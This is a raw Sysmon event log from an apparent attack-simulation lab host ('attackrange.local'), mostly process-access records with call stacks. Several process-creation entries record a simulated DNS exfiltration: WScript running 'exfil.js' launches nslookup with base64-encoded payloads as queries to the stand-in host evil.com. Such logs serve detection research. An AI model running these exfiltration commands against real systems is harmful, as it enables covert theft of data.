14:16:31.348{2E1864BB-17BF-629A-6C40-000000005F02}57602256C:\Windows\system32\conhost.exe{2E1864BB-17BF-629A-6B40-000000005F02}4148C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200296Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.333{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-6C40-000000005F02}5760C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200295Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.333{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200294Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.333{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200293Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.333{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200292Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.333{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200291Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.333{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-6B40-000000005F02}4148C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200290Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.333{2E1864BB-17A1-629A-783D-000000005F02}55527356C:\Windows\System32\WScript.exe{2E1864BB-17BF-629A-6B40-000000005F02}4148C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200289Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.333{2E1864BB-17BF-629A-6B40-000000005F02}4148C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlystnf.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000200288Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.317{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmwb.tmpMD5=08096E815298C9510FB964E33BF683ED,SHA256=94103DD12783300292E08E6F36A36F71864DF751648CBC0CFA38A7881E3764D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000200287Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.295{2E1864BB-17BF-629A-6940-000000005F02}79365960C:\Windows\system32\conhost.exe{2E1864BB-17BF-629A-6A40-000000005F02}4336C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200286Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.280{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200285Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.280{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200284Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.280{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200283Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.280{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200282Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.280{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-6A40-000000005F02}4336C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200281Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.280{2E1864BB-17BF-629A-6840-000000005F02}49922032C:\Windows\system32\cmd.exe{2E1864BB-17BF-629A-6A40-000000005F02}4336C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200280Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.290{2E1864BB-17BF-629A-6A40-000000005F02}4336C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BF-629A-6840-000000005F02}4992C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmwb.tmp 2>&1 10341000x8000000000000000200279Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.264{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BF-629A-6940-000000005F02}7936C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200278Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.264{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BF-629A-6940-000000005F02}7936C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200277Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.248{2E1864BB-17BF-629A-6940-000000005F02}79365960C:\Windows\system32\conhost.exe{2E1864BB-17BF-629A-6840-000000005F02}4992C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200276Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.248{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-6940-000000005F02}7936C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200275Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.233{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200274Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.233{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200273Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.233{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200272Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.233{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200271Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.233{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-17BF-629A-6840-000000005F02}4992C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200270Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.233{2E1864BB-17A1-629A-783D-000000005F02}55525516C:\Windows\System32\WScript.exe{2E1864BB-17BF-629A-6840-000000005F02}4992C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200269Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.244{2E1864BB-17BF-629A-6840-000000005F02}4992C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT KioqV2luMzJfU2hhcmUqKio= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmwb.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000200268Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.233{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlanfyl.tmpMD5=05BA971AFDC62533F0A9B0611710936B,SHA256=CC7F6EF6FDFF1D48F32CBB164D99D5681824740D7C263CA1F614A2D5F388A371,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000200267Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.217{2E1864BB-17BF-629A-6640-000000005F02}76888136C:\Windows\system32\conhost.exe{2E1864BB-17BF-629A-6740-000000005F02}2132C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200266Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:31.216{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 